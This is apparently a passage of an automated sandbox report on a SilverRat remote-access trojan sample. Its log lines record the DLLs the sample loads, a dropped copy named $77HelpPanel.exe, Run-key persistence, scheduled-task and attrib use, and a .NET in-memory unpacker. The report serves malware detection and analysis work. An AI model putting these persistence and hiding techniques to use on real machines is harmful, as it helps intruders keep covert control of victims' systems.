                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: YDW0S5K7hi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: YDW0S5K7hi.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: YDW0S5K7hi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: YDW0S5K7hi.exe, MessageRead.cs.Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: $77HelpPanel.exe.0.dr, MessageRead.cs.Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeCode function: 10_2_00007FFAAB412550 push eax; retf 10_2_00007FFAAB41261D

                  Persistence and Installation Behavior

                  barindex
                  Uses cmd line tools excessively to alter registry or file data
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: attrib.exe
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: attrib.exe
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeJump to dropped file

                  Boot Survival

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: YDW0S5K7hi.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
